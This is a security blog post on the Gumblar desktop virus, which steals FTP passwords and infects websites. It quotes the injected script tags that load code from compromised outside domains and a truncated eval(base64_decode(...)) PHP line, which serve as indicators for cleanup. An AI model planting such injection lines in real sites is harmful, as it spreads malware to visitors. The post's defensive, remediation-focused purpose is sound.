Web site security – It starts with your desktop

If you have a web site and you want it to be secure, the first place you have protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things:

Infects all .js files on your site with entries like this one:

document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php
document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php

It infects every .html files with entries similar to this:

script src="http://wap.northernplumbingandheating.com/assets/postinfo.php"
script src="http://shopping-dubai.com/images/runActiveContent.php"
script src="http://stb-umhau.de/images/muffin35.php"
script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"

Every PHP file with a code similar to this one:

eval(  base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEd

It also creates backdoor files called gifimg.php on multiple directories

Note that the domain changes every time and this is just a small list of them:






How to clean my desktop if I have this virus?

  1. Install an anti-virus and make sure it detected and removed the problem. If it didn’t, try a different one :)
  2. Change your FTP passwords.
  3. Start using SFTP instead of FTP
  4. Do not store your FTP/SFTP password on your desktop

How to clean my site if it is infected?

You can hire us to clean it up for you and monitor your sites going forward:Malware Removal

Or if you prefer to do yourself:

  1. Scan your site to see where the malware is and how it is called on your site
  2. Download your whole site to your desktop
  3. Use grep (or wingrep) and search for src=http, eval(base64_decode(“aW
  4. Remove all those entries as well as the gifimg.php backdoors
  5. Re-upload your site back

That should clean up your site. Note that it only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this clean up solution may not work completely.

If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.